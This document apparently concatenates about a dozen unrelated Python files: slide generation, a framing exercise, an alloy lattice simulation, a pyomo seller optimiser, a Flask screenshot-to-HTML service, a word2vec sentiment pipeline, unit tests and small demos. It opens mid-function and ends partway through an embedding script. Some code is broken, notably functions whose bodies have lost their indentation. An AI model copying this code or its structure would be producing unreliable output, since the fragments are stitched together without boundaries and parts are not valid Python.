    for i in range(0, 3):
        text = tabTextList[i]
        print " tabText = %s" % text
        tbl.cell(0, i).text = text
        tf = tbl.cell(0, i).textframe
        font = tf.paragraphs[0].font
        font.size = Pt(10)
        font.bold = False
        set_font_color_and_typeface(font, rgbColor("BLACK"), 'Arial')
    # second caption table under the bottom row of figures
    top = Cm(16.93)
    tbl = shapes.add_table(rows, cols, left, top, width, height)
    for i in range(0, 3):
        # NOTE(review): indices 2..4 overlap index 2 already used by the
        # first table -- `i + 3` was probably intended; confirm.
        text = tabTextList[i + 2]
        print " tabText = %s" % text
        tbl.cell(0, i).text = text
        tf = tbl.cell(0, i).textframe
        font = tf.paragraphs[0].font
        font.size = Pt(10)
        font.bold = False
        set_font_color_and_typeface(font, rgbColor("BLACK"), 'Arial')
def addTextBot(slide, boxText, left=Cm(0.0), top=Cm(17.55)):
    """Add a single-line, full-width text box near the bottom of *slide*."""
    #---- add text box on the bottom--------------
    # left = Cm(0.0)
    # top = Cm(17.55)
    width = Cm(25.4)
    height = Cm(1.0)
    txBox = slide.shapes.add_textbox(left, top, width, height)
    tf = txBox.textframe
    tf.text = boxText
    tf.paragraphs[0].font.size = Pt(14)
    tf.paragraphs[0].font.bold = False
    #p = tf.add_paragraph()
    #p.text = boxText
    #p.font.bold = False
    #p = tf.add_paragraph()
    #p.text = "This is a third paragraph that's big"
    #p.font.size = Pt(40)
    #f = txBox.textframe
def rgbColor(colorName):
    """Map a colour name (ORANGE/WHITE/BLACK) to its hex RGB string."""
    return {
        "ORANGE": 'FF6600',
        "WHITE": 'FFFFFF',
        "BLACK": '000000',
    }[colorName]
def set_font_color_and_typeface(font, rgbColor, typeface=None):
    """Set a run font's solid-fill colour (hex string) and optional typeface
    by appending a:solidFill / a:latin elements to the underlying rPr XML."""
    # NOTE(review): reaches into the name-mangled private attribute
    # _Font__rPr -- fragile across python-pptx versions.
    rPr = font._Font__rPr
    solidFill = _SubElement(rPr, 'a:solidFill')
    srgbClr = _SubElement(solidFill, 'a:srgbClr')
    srgbClr.set('val', rgbColor)
    if typeface:
        latin = _SubElement(rPr, 'a:latin')
        latin.set('typeface', typeface)
if __name__ == "__main__":
main()
|
# Ejercicio 6
def frameSpace1(text, spaces):  # Solution 1: several accumulator variables
    """Return *text* framed in asterisks with *spaces* hollow framed lines
    between the text line and the top/bottom borders.

    Bug fix: the bottom padding loop ran ``range(1, spaces)`` (spaces - 1
    lines) while the top ran ``range(1, spaces + 1)`` (spaces lines), so
    the frame was asymmetric; both sides now get exactly *spaces* lines,
    matching frameSpace2.
    """
    width = len(text) + 4                          # border width in asterisks
    frameUpDown = "*" * width + "\n"               # top/bottom border line
    frameMidle = "*" + " " * (width - 2) + "*\n"   # hollow spacer line
    frameFinal = frameUpDown
    frameFinal += frameMidle * spaces              # padding above the text
    frameFinal += f"* {text} * \n"
    frameFinal += frameMidle * spaces              # was spaces - 1: off-by-one
    frameFinal += frameUpDown
    return frameFinal
def frameSpace2(text, spaces):  # Solution 2: a single accumulator variable
    """Frame *text* in asterisks with *spaces* hollow lines above and below
    the text line. Note: the bottom border carries no trailing newline."""
    width = len(text) + 4
    border = ""
    for _ in range(width):          # top/bottom border
        border += "*"
    hollow = ""
    for col in range(1, width + 1): # hollow spacer: stars only at the edges
        hollow += "*" if col in (1, width) else " "
    out = border + "\n"
    for _ in range(spaces):
        out += hollow + "\n"
    out += f"* {text} * \n"
    for _ in range(spaces):
        out += hollow + "\n"
    out += border                   # no trailing newline, as in the original
    return out
# Casos de prueba
test1 = frameSpace1("You only live once",3)
test2 = frameSpace2("Water fountain",3)
print(test1)
print(test2) |
n, m = map(int, input().split())
array = [int(input()) for _ in range(n)]
# Presence table: d[v] == 1 iff value v was read.
# NOTE(review): assumes all values and m are < 1000 -- IndexError otherwise.
d = [0] * 1000
for i in array:
    d[i] = 1
# Print 1 if m occurred among the n values, otherwise -1.
if d[m] == 0:
    print(-1)
else:
    print(d[m])
import simulationRunningFunctions as srf
from math import factorial, fabs
def binProb(n, comp, dimensions, gridLength):
    """Expected number of lattice sites with exactly *n* unlike nearest
    neighbours in a random (binomial) two-species mixture.

    n: number of unlike neighbours (0..Z)
    comp: composition of one species, in percent (0-100)
    dimensions: 2 (square lattice, Z=4) or 3 (cubic lattice, Z=6)
    gridLength: number of sites per grid edge

    Raises:
        ValueError: if dimensions is not 2 or 3 (previously this fell
        through and crashed later with NameError on Z).
    """
    nAtoms = gridLength**dimensions
    if dimensions == 2:
        Z = 4  # no. of nearest neighbours for a given atom
    elif dimensions == 3:
        Z = 6
    else:
        raise ValueError("dimensions must be 2 or 3, got %r" % (dimensions,))
    f = comp / 100
    # Binomial distribution formula (next 2 lines):
    ZCn = factorial(Z) / float(factorial(n) * factorial(Z - n))
    P = ZCn * (f * f**(Z - n) * (1 - f)**n + (1 - f) * f**n * (1 - f)**(Z - n))
    nEXP = nAtoms * P
    return nEXP
def unlikeNeighbourCount(grid, xC, yC, zC, dimensions):
    """Returns count of how many unlike neighbours are around atom C.

    Negative indices wrap automatically in numpy indexing, so only the
    upper-edge neighbours (xD, yR, zAP) are passed through srf.cValidate.
    Fix: the neighbour comparisons were previously built as strings and
    run through eval(); they are now plain direct indexing.
    """
    lengthOfGrid = len(grid)
    xU, yU = xC - 1, yC
    xD, yD = xC + 1, yC
    xL, yL = xC, yC - 1
    xR, yR = xC, yC + 1
    xD = srf.cValidate(xD, grid, lengthOfGrid, 'x', dimensions)
    yR = srf.cValidate(yR, grid, lengthOfGrid, 'y', dimensions)
    xList = [xU, xD, xL, xR]
    yList = [yU, yD, yL, yR]
    if dimensions == 3:
        zU, zD, zL, zR = zC, zC, zC, zC
        xBP, yBP, zBP = xC, yC, zC - 1
        xAP, yAP, zAP = xC, yC, zC + 1
        zAP = srf.cValidate(zAP, grid, lengthOfGrid, 'z', dimensions)
        xList.extend([xBP, xAP])
        yList.extend([yBP, yAP])
        zList = [zU, zD, zL, zR, zBP, zAP]
    tempCount = 0
    # Compare each neighbour's occupant with the centre atom directly.
    for i, x in enumerate(xList):
        if dimensions == 3:
            if grid[x, yList[i], zList[i]] != grid[xC, yC, zC]:
                tempCount += 1
        else:
            if grid[x, yList[i]] != grid[xC, yC]:
                tempCount += 1
    return tempCount
def generate_nList(grid, dimensions):
    """Generate nList: a histogram of unlike-neighbour counts over the grid.

    nList[k] is the number of grid sites having exactly k unlike
    neighbours, for k = 0 .. 2*dimensions."""
    size = len(grid)
    nList = [0] * (dimensions * 2 + 1)
    for x in range(size):
        for y in range(size):
            if dimensions == 2:
                # tally this site's unlike-neighbour count
                nList[unlikeNeighbourCount(grid, x, y, None, dimensions)] += 1
            else:
                for z in range(size):
                    nList[unlikeNeighbourCount(grid, x, y, z, dimensions)] += 1
    return nList
def findNumOfUnlikeBonds(grid, dimensions):
    """Returns total number of unlike bonds in grid.

    Each bond is shared between two sites, hence the factor 0.5."""
    nList = generate_nList(grid, dimensions)
    return sum(0.5 * count * unlike for unlike, count in enumerate(nList))
# #Order Measuring Function
def getOrder(grid, comp, dimensions):
    """Measure how far the unlike-neighbour distribution deviates from the
    random (binomial) expectation.

    Returns (mean absolute difference, observed histogram, expected
    histogram)."""
    nList = generate_nList(grid, dimensions)
    EXPList = [binProb(i, comp, dimensions, len(grid)) for i in range(len(nList))]
    differenceCount = 0
    for observed, expected in zip(nList, EXPList):
        differenceCount += fabs(observed - expected)
    # normalise by the number of histogram bins (1/7 for 3D, 1/5 for 2D)
    differenceCount *= 1 / float(len(nList))
    return differenceCount, nList, EXPList
def getTotalEnergy(grid, localEam, dimensions):
    """Total mixing energy: (number of unlike bonds) x (energy per bond)."""
    return findNumOfUnlikeBonds(grid, dimensions) * localEam
|
# -*- coding: utf-8 -*-
import pyomo.environ as pyomo
from pyomo.opt import SolverFactory
def optimize(data, config):
    """Assign each product to exactly one seller, minimising a weighted sum
    of penalties (shipping cost >> seller count >> distance >> order count,
    via 1e9/1e6/1e3/1 weights on normalised terms).

    data: list of dicts with keys 'product', 'seller', 'shippingcost',
          'distance', 'ordercount' (one row per product/seller offer).
    config: dict holding the solver name/path under config['app'].
    Returns a dict with solver status, aggregate totals and the chosen
    product->seller assignments.
    """
    # model
    model = pyomo.ConcreteModel()
    # parameters: per-seller attributes (last record wins on duplicate sellers)
    shippingcost = {x['seller']: x['shippingcost'] for x in data}
    distance = {x['seller']: x['distance'] for x in data}
    ordercount = {x['seller']: x['ordercount'] for x in data}
    # define sets
    I = list(set(x['product'] for x in data))
    J = list(set(x['seller'] for x in data))
    IJ = [(x['product'], x['seller']) for x in data]
    # decision variables: x[i,j] = product i bought from seller j;
    # y[j] = seller j is used at all (both 0/1)
    model.x = pyomo.Var(IJ, domain=pyomo.Integers, bounds=(0, 1), doc='trans')
    model.y = pyomo.Var(J, domain=pyomo.Integers, bounds=(0, 1), doc='sellertrans')
    # constraints
    model.cons = pyomo.ConstraintList(doc='constraints')
    # each product must be bought exactly once
    for i in I:
        model.cons.add(sum([model.x[ij] for ij in model.x if ij[0] == i]) == 1)
    # big-M linking: a seller can only ship if it is marked as used
    maxtrans = len(IJ)
    for j in J:
        model.cons.add(sum([model.x[ij] for ij in model.x if ij[1] == j]) <= model.y[j] * maxtrans)
    # objective function: each term is normalised to [0, 1] and weighted so
    # the terms are effectively lexicographic by magnitude
    shippingcost_penalty = 0 if sum(shippingcost.values()) == 0 \
        else 1000000000 * (sum(model.y[j] * shippingcost[j] for j in J) / sum(shippingcost.values()))
    sellertotal_penalty = 0 if len(J) == 0 \
        else 1000000 * (sum(model.y[j] for j in J) / len(J))
    distance_penalty = 0 if sum(distance.values()) == 0 \
        else 1000 * (sum(model.y[j] * distance[j] for j in J) / sum(distance.values()))
    ordercount_penalty = 0 if sum(ordercount.values()) == 0 \
        else 1 * (sum(model.y[j] * ordercount[j] for j in J) / sum(ordercount.values()))
    model.obj = pyomo.Objective(expr = shippingcost_penalty + sellertotal_penalty + distance_penalty + ordercount_penalty,
                                sense = pyomo.minimize)
    # solve
    if config['app']['solver_path'] == "None":
        s = SolverFactory(config['app']['solver'])
    else:
        s = SolverFactory(config['app']['solver'], executable=config['app']['solver_path'])
    status = s.solve(model)
    # gen output
    x = []
    for ij in model.x:
        # NOTE(review): .value may be None if the solve failed -- the
        # comparison would then raise; status should be checked first.
        if model.x[ij].value > 0:
            x.append({
                "product": ij[0],
                "seller": ij[1],
                "shippingcost": shippingcost[ij[1]],
            })
    y = []
    for j in model.y:
        if model.y[j].value > 0:
            y.append({
                "seller": j,
            })
    output = {
        "status_solver": str(status['Solver'][0]['Status']),
        "status_termination": str(status['Solver'][0]['Termination condition']),
        "total_shippingcost": sum([shippingcost[j['seller']] for j in y]),
        "total_sellers": len(y),
        "total_distance": sum([distance[j['seller']] for j in y]),
        "total_ordercount": sum([ordercount[j['seller']] for j in y]),
        "result": x
    }
    return output
from src.utils.request import get_text, get_bytes
import json
from random import choice
async def get_erciyuan():
    """Fetch a random anime-image URL from the mtyqx API.

    Returns:
        The image URL on success, or '' when the API reports failure.
    """
    api_url = 'https://api.mtyqx.cn/api/random.php?return=json'
    # Removed a leftover debug print(data) that spammed the console on every call.
    data = json.loads(await get_text(api_url))
    # NOTE(review): assumes the API returns "code" as the string '200';
    # if it is an int this branch silently never matches — confirm.
    if data['code'] == '200':
        return data['imgurl']
    else:
        return ''
|
# Read T test cases; P is part of the input format but unused here.
T = int(input())
P = int(input())
for case_no in range(T):
    answers = []
    scores = []
    # Each case consists of 100 binary answer strings (truncated to 1000 chars).
    for _ in range(100):
        line = input()[:1001]
        answers.append([int(digit) for digit in line])
    # Score each row by its count of ones; the original shadowed the builtin
    # `sum` with a local accumulator — use the builtin directly instead.
    for row in answers:
        scores.append(sum(row))
    # Report the 1-based index of the first highest-scoring row.
    print("Case #" + str(case_no + 1) + ": " + str(scores.index(max(scores)) + 1))
|
# import packages
import PyPDF2
import os
def searchInPDF(filename, s):
    """Return True if the substring *s* occurs in any page of the PDF *filename*."""
    reader = PyPDF2.PdfFileReader(filename)
    for page_index in range(reader.getNumPages()):
        # Page text is lower-cased so the search is case-insensitive.
        page_text = reader.getPage(page_index).extractText().rstrip('\n').lower()
        if s in page_text:
            return True
    return False
# Clear the console (Windows-only "cls").
os.system("cls")
directory = os.getcwd()
s = input("Please enter the expression you want to search : ")
# Strip all spaces from the query — presumably because extracted PDF text
# loses spacing too; confirm against searchInPDF's extractText output.
inp = ""
for c in s.lower():
    if c != " ":
        inp += c
# Collect the names of PDFs in the current directory that contain the query.
a = []
for filename in os.listdir(directory):
    if filename.endswith(".pdf"):
        print("Recherche dans", filename, "...")
        res = searchInPDF(filename, inp)
        if res == True:
            a.append(filename)
os.system("cls")
if len(a) != 0:
    print("'" + s + "' was found in the following PDFs: ")
    print(a)
else:
    print("'" + s + "' wasn't found.")
from app import *
from flask import session, redirect, url_for, render_template, abort, request, flash, send_from_directory, jsonify
import os
from models import Projects
from keras import backend as K
@app.route('/project', methods=['GET', 'POST'])
def generate():
    """POST: create a project from an uploaded screenshot and generate HTML.

    GET: render the generator page.
    """
    if request.method == 'POST':
        project_name = request.form.get('project_name')
        style = request.form.get('style')
        # Prep model on basis of which model is requested
        model = prep_model()
        # check if the post request has the file part
        if 'file' not in request.files:
            flash('No file part')
            return redirect(request.url)
        file = request.files['file']
        # if user does not select file, browser still
        # submits an empty part without filename
        if file.filename == '':
            flash('No selected file')
            return redirect(request.url)
        # NOTE(review): a POST with a disallowed file type falls through this
        # branch and the view returns None — confirm that is intended.
        if file and allowed_file(file.filename):
            # Persist the project first so its id can name the uploaded file.
            new_project = Projects(project_name)
            db.session.add(new_project)
            db.session.commit()
            project_id = new_project.id
            file_name = str(project_id) + '.png'
            file_address = os.path.join(os.getcwd(), app.config['UPLOAD_FOLDER'], file_name)
            file.save(file_address)
            output_folder = os.path.join(os.getcwd(), app.config['OUTPUT_FOLDER'])
            # Convert the uploaded image to HTML with the prepared model.
            html = model.convert_single_image(output_folder, png_path=file_address, print_generated_output=0, get_sentence_bleu=0, original_gui_filepath=None, style=style)
            project = Projects.get_project_by_id(project_id)
            project.html_code = html
            # NOTE(review): deploy URL hard-codes localhost:5000 — confirm for production.
            project.deploy_url = f'http://localhost:5000/deploy/{project_id}'
            db.session.add(project)
            db.session.commit()
            # Release Keras/TF session state between requests.
            K.clear_session()
            return get_project(project_id)
    else:
        return render_template('generator_page.html')
@app.route('/project/<id>', methods=['GET'])
def get_project(id):
    """Return a single project as JSON."""
    return jsonify(Projects.get_project_by_id(id).to_dict())
@app.route('/dashboard', methods=['GET'])
def dash():
    """Return every project as a JSON list."""
    return jsonify([project.to_dict() for project in Projects.query.all()])
@app.route('/deploy/<project_id>', methods=['GET'])
def deploy(project_id):
    """Serve a project's generated HTML directly."""
    project = Projects.get_project_by_id(project_id)
    return project.html_code
@app.route('/html/<id>', methods=['POST'])
def change_html(id):
    """Overwrite a project's HTML with the posted 'html_code' form field."""
    project = Projects.get_project_by_id(id)
    project.html_code = request.form.get('html_code')
    db.session.add(project)
    db.session.commit()
    return get_project(id)
# Static file pass-through routes.
@app.route('/output/<path:path>')
def generated(path):
    return send_from_directory('generated', path)
@app.route('/upload/<path:path>')
def uploaded(path):
    return send_from_directory('upload', path)
@app.route('/static/<path:path>')
def staticpath(path):
    return send_from_directory('static', path)
|
# -*- coding: utf-8 -*-
from sklearn.ensemble import RandomForestClassifier
from gensim.models import Word2Vec
import _pickle as cPickle
import pymorphy2
import csv
import re
# Source tweet corpora.
filenamePositive = "./csv/positive.csv"
filenameNegative = "./csv/negative.csv"
# Lemmatized ("normal form") train/test artefacts.
filenameNormFormPos = "./csv/normFormPos.csv"
filenameNormFormNeg = "./csv/normFormNeg.csv"
filenameNormFormPos_test = "./csv/normFormPos_test.csv"
filenameNormFormNeg_test = "./csv/normFormNeg_test.csv"
# Per-tweet collapsed feature vectors.
filenameVecPos = "./csv/vecPos.csv"
filenameVecNeg = "./csv/vecNeg.csv"
filenameVecPos_test = "./csv/vecPos_test.csv"
filenameVecNeg_test = "./csv/vecNeg_test.csv"
# Saved Word2Vec model and pickled classifier.
filenameWVModel = "./models/W2V/analyzer.model"
filenameClassifier = "./models/Classifier/classifier.pkl"
# pymorphy2 POS tags of content words kept during normalization.
necessary_part = ["NOUN", "ADJF", "ADJS", "VERB", "INFN", "PRTF", "PRTS", "GRND"]
morf = pymorphy2.MorphAnalyzer()
# Dimensionality of the Word2Vec embeddings.
vector_size = 300
# W2V_model = 0
# classifier = 0
def progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=50, fill='█', printEnd="\r"):
    """Render a single-line textual progress bar on the console."""
    pct_template = "{0:." + str(decimals) + "f}"
    percent = pct_template.format(100 * (iteration / float(total)))
    done = int(length * iteration // total)
    bar = fill * done + '-' * (length - done)
    print('\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end=printEnd)
    # Terminate the line once the bar is complete.
    if iteration == total:
        print()
def read_twit(file_path):
    """Read tweets from a ';'-delimited CSV and split 90% train / 10% test.

    Column 3 holds the tweet text; everything except Cyrillic letters and
    whitespace is stripped, then runs of whitespace are collapsed.
    """
    training_sample = []
    test_sample = []
    total_rows = quantityRowInCSV(file_path)
    with open(file_path, "r", encoding='utf8', newline="") as handle:
        reader = csv.reader(handle, delimiter=';', quotechar='"')
        for row_no, row in enumerate(reader, start=1):
            text = re.sub(r"[^А-Яа-я\s]+", "", row[3]).strip()
            text = re.sub(r"[_A-Za-z0-9]+", "", text).strip()
            text = re.sub(r"[\s]{2,}", " ", text)
            target = training_sample if row_no / total_rows <= 0.9 else test_sample
            target.append(text)
    return training_sample, test_sample
def quantityRowInCSV(filename):
    """Count the rows in a ';'-delimited CSV file."""
    with open(filename, "r", encoding='utf8', newline="") as handle:
        return sum(1 for _ in csv.reader(handle, delimiter=';', quotechar='"'))
def normalizationOfSentence(sentence):
    """Lemmatize *sentence*, keeping only content-word parts of speech.

    Uses the module-level pymorphy2 analyzer and the necessary_part POS list.
    """
    lemmas = []
    for token in sentence.lower().split():
        parsed = morf.parse(token)[0]
        if parsed.tag.POS in necessary_part:
            lemmas.append(parsed.normal_form)
    return lemmas
def load_w2v_model():
    """Load the previously trained Word2Vec model from disk."""
    return Word2Vec.load(filenameWVModel)
def recordNormalForms(dt, file_path):
    """Write each token list in *dt* as one ';'-separated CSV row."""
    with open(file_path, "w", newline='') as csv_file:
        csv.writer(csv_file, delimiter=';').writerows(dt)
def normalization_mas_sentence(mas_sentence, file_path_save=None):
    """Lemmatize every sentence, dropping those that normalize to nothing.

    Shows a console progress bar; optionally persists the result to
    *file_path_save*.  Always returns the list of token lists — the original
    implicitly returned None when the result was empty, forcing callers to
    guard against two different "empty" values.
    """
    result = []
    total = len(mas_sentence)
    progress_bar(0, total, prefix='Progress:', suffix='Complete', length=50)
    for i in range(total):
        norm = normalizationOfSentence(mas_sentence[i])
        if len(norm) != 0:
            result.append(norm)
        # i + 1 so the bar reaches 100% on the last sentence
        # (the original passed i and never completed the bar).
        progress_bar(i + 1, total, prefix='Progress:', suffix='Complete', length=50)
    if file_path_save is not None:
        recordNormalForms(result, file_path_save)
    return result
def create_w2v_model(dt_Positive, dt_Negative, dt_PositiveTest, dt_NegativeTest):
    """Train a skip-gram Word2Vec model on all four sample sets and save it."""
    # sg=1 selects skip-gram; min_count=0 keeps every token.
    mdl = Word2Vec(dt_Positive + dt_Negative + dt_PositiveTest + dt_NegativeTest, size=vector_size, window=7,
                   min_count=0, workers=8, sg=1)
    # Normalize the vectors in place (gensim init_sims); the model can no
    # longer be trained afterwards — NOTE(review): deprecated in gensim 4.
    mdl.init_sims(replace=True)
    mdl.save(filenameWVModel)
    return mdl
def test_model(model, data_positive_test, data_negative_test):
arr = model.predict(data_positive_test)
number_positive = 0
for i in arr:
if i == 1:
number_positive += 1
arr = model.predict(data_negative_test)
number_negative = 0
for i in arr:
if i == -1:
number_negative += 1
print("ACC = ", (number_positive + number_negative) / (len(data_positive_test) + len(data_negative_test)))
def featurize_w2v(model, sentences):
    """Collapse each token into one scalar: the mean of its embedding components.

    Parameters
    ----------
    model: mapping from word to a vector of length `vector_size`
        (raises KeyError for out-of-vocabulary words)
    sentences: list of tokens

    Returns a list with one float per token; out-of-vocabulary tokens yield
    0.0 — the original divided by a zero count and crashed on them.  Also
    removes a leftover `print(word)` that ran vector_size times per token.
    """
    v = []
    for word in sentences:
        try:
            # Look the word up once instead of once per component.
            vec = model[word]
        except KeyError:
            v.append(0.0)
            continue
        component_sum = 0
        for i in range(0, vector_size):
            component_sum += vec[i]
        v.append(component_sum / vector_size)
    return v
def calc_vector(WVmodel, mas_sentence, file_path=None):
    """Replace each token list in *mas_sentence* IN PLACE with its collapsed
    feature vector; optionally dump the result as a ';'-separated CSV.

    Returns None — callers rely on the in-place mutation.
    """
    for i in range(0, len(mas_sentence)):
        mas_sentence[i] = featurize_w2v(WVmodel, mas_sentence[i])
    if file_path is not None:
        with open(file_path, "w", newline='') as csv_file:
            writer = csv.writer(csv_file, delimiter=';')
            for line in mas_sentence:
                writer.writerow(line)
def read_normalize_form(file_path):
    """Read back token rows previously written by recordNormalForms."""
    with open(file_path, "r", encoding='utf8', newline="") as handle:
        return [row for row in csv.reader(handle, delimiter=';', quotechar='"')]
def init(read_source=False, read_normalize=False, load_models=False, load_classifier=False):
    """Build or load the Word2Vec model and the random-forest classifier.

    Returns (w2v_model, forest).

    NOTE(review): when neither read_source nor read_normalize is set and
    load_classifier is False, the data_* variables are undefined and this
    raises NameError — confirm callers always pass a consistent combination.
    """
    if read_source:
        # Read positive tweets.
        print("Чтение позитивных твитов")
        data_positive, data_positive_test = read_twit(filenamePositive)
        print(" Готово")
        # Read negative tweets.
        print("Чтение негативных твитов")
        data_negative, data_negative_test = read_twit(filenameNegative)
        print(" Готово")
        # Lemmatize all four sample sets, persisting each to disk.
        print("Нормализация предложений")
        data_positive = normalization_mas_sentence(data_positive, file_path_save=filenameNormFormPos)
        data_negative = normalization_mas_sentence(data_negative, file_path_save=filenameNormFormNeg)
        data_positive_test = normalization_mas_sentence(data_positive_test, file_path_save=filenameNormFormPos_test)
        data_negative_test = normalization_mas_sentence(data_negative_test, file_path_save=filenameNormFormNeg_test)
        print(" Готово")
    if read_normalize:
        # Load previously lemmatized sentences from disk instead.
        data_positive = read_normalize_form(filenameNormFormPos)
        data_negative = read_normalize_form(filenameNormFormNeg)
        data_positive_test = read_normalize_form(filenameNormFormPos_test)
        data_negative_test = read_normalize_form(filenameNormFormNeg_test)
    if not load_models:
        print("Создание WV модели")
        model_w2v = create_w2v_model(data_positive, data_negative, data_positive_test, data_negative_test)
        print(" Готовов")
    else:
        print("Загрузка WV модели")
        model_w2v = load_w2v_model()
        print(" Модель загружена")
    if not load_classifier:
        print("Считаем векора")
        # calc_vector mutates the lists in place: token lists become scalars.
        calc_vector(model_w2v, data_positive, filenameVecPos)
        calc_vector(model_w2v, data_negative, filenameVecNeg)
        calc_vector(model_w2v, data_positive_test, filenameVecPos_test)
        calc_vector(model_w2v, data_negative_test, filenameVecNeg_test)
        print(" Готовов")
        print("\nНачато создание леса")
        Y_pos = [1 for _ in range(len(data_positive))]
        Y_neg = [-1 for _ in range(len(data_negative))]
        forest = RandomForestClassifier(n_estimators=100, n_jobs=-1)
        # Bug fix: the original called classifier.fit(...) and pickled
        # `classifier`, but only `forest` exists in this scope (NameError).
        forest.fit(data_positive + data_negative, Y_pos + Y_neg)
        print(" Лес построен")
        with open(filenameClassifier, 'wb') as fid:
            cPickle.dump(forest, fid)
    else:
        print("\nЗагрузка классификатора")
        with open(filenameClassifier, 'rb') as fid:
            forest = cPickle.load(fid)
        print(" Классификатор загружен")
    return model_w2v, forest
if __name__ == '__main__':
    # Load pre-trained models and push one sentence through the pipeline.
    model, classifier = init(read_source=False, read_normalize=False, load_models=True, load_classifier=True)
    sentence = 'Напомним , разбить понизить, потерять, заболеть, разочаровательный, грубо губернатор Волгоградской области Андрей Бочаров.'
    mas_normalized_word = normalizationOfSentence(sentence)
    print(mas_normalized_word)
    # Collapse each lemma into a scalar feature (classification is commented out).
    mas_collapsed_vectors = featurize_w2v(model, mas_normalized_word)
    # $arr = classifier.predict(mas_collapsed_vectors)
    # print(arr)
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# type: ignore
from logging import WARNING
from unittest import TestCase
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
class TestInstrumentor(TestCase):
    # Minimal concrete instrumentor used to exercise BaseInstrumentor's
    # double-instrument / double-uninstrument guard logic.
    class Instrumentor(BaseInstrumentor):
        def _instrument(self, **kwargs):
            return "instrumented"
        def _uninstrument(self, **kwargs):
            return "uninstrumented"
        def instrumentation_dependencies(self):
            return []
    def test_protect(self):
        # Redundant calls must warn and return None instead of re-running hooks.
        instrumentor = self.Instrumentor()
        with self.assertLogs(level=WARNING):
            self.assertIs(instrumentor.uninstrument(), None)
        self.assertEqual(instrumentor.instrument(), "instrumented")
        with self.assertLogs(level=WARNING):
            self.assertIs(instrumentor.instrument(), None)
        self.assertEqual(instrumentor.uninstrument(), "uninstrumented")
        with self.assertLogs(level=WARNING):
            self.assertIs(instrumentor.uninstrument(), None)
    def test_singleton(self):
        # Instantiating the same instrumentor class twice yields one object.
        self.assertIs(self.Instrumentor(), self.Instrumentor())
|
__author__ = 'samyvilar'
from test.test_back_end.test_emitter.test_statements.test_compound import TestStatements
from front_end.parser.types import CharType
from front_end.parser.ast.expressions import ConstantExpression, IntegerType
class TestCompoundAssignment(TestStatements):
    def test_compound_addition(self):
        # a += b with a=10, b=1 must leave 11 as the block's final value.
        code = """
        {
            int a = 10, b = 1;
            a += b;
        }
        """
        self.evaluate(code)
        self.assert_base_element(ConstantExpression(11, IntegerType()))
class TestPointerArithmetic(TestStatements):
    # Each test compiles a small C block and checks the value produced by the
    # final statement; sizeof(struct foo) fixes the pointer-arithmetic scale.
    def test_array_assignment(self):
        code = """
        {
            char values[2];
            values[1] = 127;
        }
        """
        self.evaluate(code)
        self.assert_base_element(ConstantExpression(127, CharType()))
    def test_pointer_subtraction_zero(self):
        # (foo*)sizeof(struct foo) minus one element lands on address 0.
        code = """
        {
            unsigned int size = -1;
            struct foo {double a; int b[10];} *a = (void *)sizeof(struct foo);
            size = a - 1;
        }
        """
        self.evaluate(code)
        self.assert_base_element(ConstantExpression(0, IntegerType()))
    def test_pointer_pointer_subtraction(self):
        # Difference between two foo* one struct apart must be 1 element.
        code = """
        {
            unsigned int index = 0;
            struct foo {double a; int b[10];}
                *a = (void *)0,
                *b = (void *)sizeof(struct foo);
            index = b - a;
        }
        """
        self.evaluate(code)
        self.assert_base_element(ConstantExpression(1, IntegerType()))
    def test_pointer_addition(self):
        # a++ advances the pointer by exactly sizeof(struct foo) bytes.
        code = """
        {
            unsigned int offset = -1;
            struct foo {double a; int b[10];};
            struct foo *a = (void *)0;
            a++;
            offset = (unsigned long long)a - sizeof(struct foo);
        }
        """
        self.evaluate(code)
        self.assert_base_element(ConstantExpression(0, IntegerType()))
#!/usr/bin/env
#-*- coding:UTF-8 -*-
'''
Created on 2017年8月30日
@author: Administrator
'''
def printme(str):
    """Print the passed-in string to standard output."""
    # NOTE(review): the parameter shadows the builtin `str`; renaming it would
    # change the keyword-call interface, so it is left as-is.
    print str
    return
# Call the user-defined function twice.
printme("我要调用用户自定义函数!");
printme("再次调用同一函数");
# import datetime
# i = datetime.datetime.now()
# print ("当前的日期和时间是 %s" % i)
# print ("ISO格式的日期和时间是 %s" % i.isoformat() )
# print ("当前的年份是 %s" %i.year)
# print ("当前的月份是 %s" %i.month)
# print ("当前的日期是 %s" %i.day)
# print ("dd/mm/yyyy 格式是 %s/%s/%s" % (i.day, i.month, i.year) )
# print ("当前小时是 %s" %i.hour)
# print ("当前分钟是 %s" %i.minute)
# print ("当前秒是 %s" %i.second)
# import time
# import calendar
#
# temptime=time.clock()
# print temptime
#
# localtime=time.localtime(time.time())
# print '本地时间为:',localtime
# print '年',localtime.tm_year
#
# # 格式化成2016-03-20 11:45:39形式
# print time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
#
# cal=calendar.month(2017,8);
# print cal
|
# A sample run on the BlogCatalog Dataset
import numpy as np
import pandas as pd
from scipy.sparse import csr_matrix
from sklearn.preprocessing import normalize
import RandNE
from eval import Precision_Np, AUC
dataset = 'blogcatalog' # blogcatalog or youtube
if __name__ == '__main__':
    print('---loading dataset---')
    if dataset == 'blogcatalog':
        data = pd.read_csv('BlogCatalog.csv')
        data = np.array(data) - 1  # change index to start from 0
        N = np.max(np.max(data)) + 1
        A = csr_matrix((np.ones(data.shape[0]), (data[:, 0], data[:, 1])), shape=(N, N))
        # make undirected
        A += A.T
    elif dataset == 'youtube':
        data = pd.read_csv('release-youtube-links.txt', sep='\t')
        data = np.array(data) - 1
        N = np.max(np.max(data)) + 1
        A = csr_matrix((np.ones(data.shape[0]), (data[:, 0], data[:, 1])), shape=(N, N))
        # make undirected; edges present in both directions become 2, so clamp
        A += A.T
        A = A - (A == 2)
        # delete nodes without edges
        temp_choose = np.squeeze(np.array(np.sum(A, axis=0) > 0))
        A = A[temp_choose, :][:, temp_choose]
    else:
        raise NotImplementedError('Unsupported dataset')
    # Common parameters
    d = 128
    Ortho = False
    seed = 0
    print('---calculating embedding---')
    # embedding of the adjacency matrix, for reconstruction
    q = 3
